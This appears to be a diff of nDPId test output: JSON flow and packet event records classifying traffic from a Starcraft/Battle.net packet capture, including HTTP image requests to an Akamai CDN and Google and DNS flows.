+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1437389985892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985892,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN9AAIAG2oTAqAFkAuQucA3IAFBzB1TrAAAAAIACIACFpQAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOBAAIAG2oPAqAFkAuQucA3JAFBxSWFcAAAAAIACIAB68QAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOFAAIAG2oLAqAFkAuQucA3KAFB0cH\/ZAAAAAIACIABZTAAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985923,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985923,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOZAAIAG2n3AqAFkAuQucA3NAFAjKxvdAAAAAIACIAAOiwAAAgQFtAEDAwgBAQQC"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1437389985927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985927,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDci+ghTYcwdU7IASOQiZNAAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1437389985927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985927,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOdAAIAG2ojAqAFkAuQucA3IAFBzB1TsvoIU2VAQAQASDQAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1437389985929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985929,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcngMONLcUlhXYASOQieXgAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 